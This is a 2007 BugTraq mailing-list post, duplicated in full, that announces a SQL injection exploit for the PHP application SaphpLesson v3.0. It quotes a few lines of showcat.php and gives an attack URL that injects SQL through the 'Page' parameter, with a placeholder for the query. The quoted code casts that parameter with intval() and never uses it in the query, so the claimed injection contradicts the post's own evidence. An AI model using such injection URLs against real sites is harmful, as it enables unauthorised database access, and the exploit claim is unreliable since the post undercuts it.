BugTraq
Back to list
|
Post reply
SaphpLesson v3.0 SQL Injection Exploit
Feb 22 2007 09:25AM
gamr-14 hotmail com
//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
------------------------------------------------------------------------
-------
Line 19'/'23 of showcat.php ||
---------------<? ||
$forumid = intval($_GET["forumid"]); ||
||
$Page = intval($_GET["Page"]); ||
||
$tit = mysql_query("select Title,CatID from forums where id=$forumid"); ||
?>----------------------------------------------------------------------
-------
ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#
/*'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/*
END
___________K-S-A______________
|ÜÜÜÜÜÜTeam AL-GaRNiÜÜÜÜÜÜÜÜÜÜÜ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|ÜÜÜÜÜgamr-14 (at) hotmail (dot) com [email concealed]ÜÜÜÜÜÜÜ|
|ÜÜÜÜÜÜÜÜÜm-o-t (at) msn (dot) com [email concealed]ÜÜÜÜÜÜÜÜÜ|
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
------------------------------------------------------------------------
-------
Line 19'/'23 of showcat.php ||
---------------<? ||
$forumid = intval($_GET["forumid"]); ||
||
$Page = intval($_GET["Page"]); ||
||
$tit = mysql_query("select Title,CatID from forums where id=$forumid"); ||
?>----------------------------------------------------------------------
-------
ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#
/*'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/*
END
___________K-S-A______________
|ÜÜÜÜÜÜTeam AL-GaRNiÜÜÜÜÜÜÜÜÜÜÜ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|ÜÜÜÜÜgamr-14 (at) hotmail (dot) com [email concealed]ÜÜÜÜÜÜÜ|
|ÜÜÜÜÜÜÜÜÜm-o-t (at) msn (dot) com [email concealed]ÜÜÜÜÜÜÜÜÜ|
[ reply ]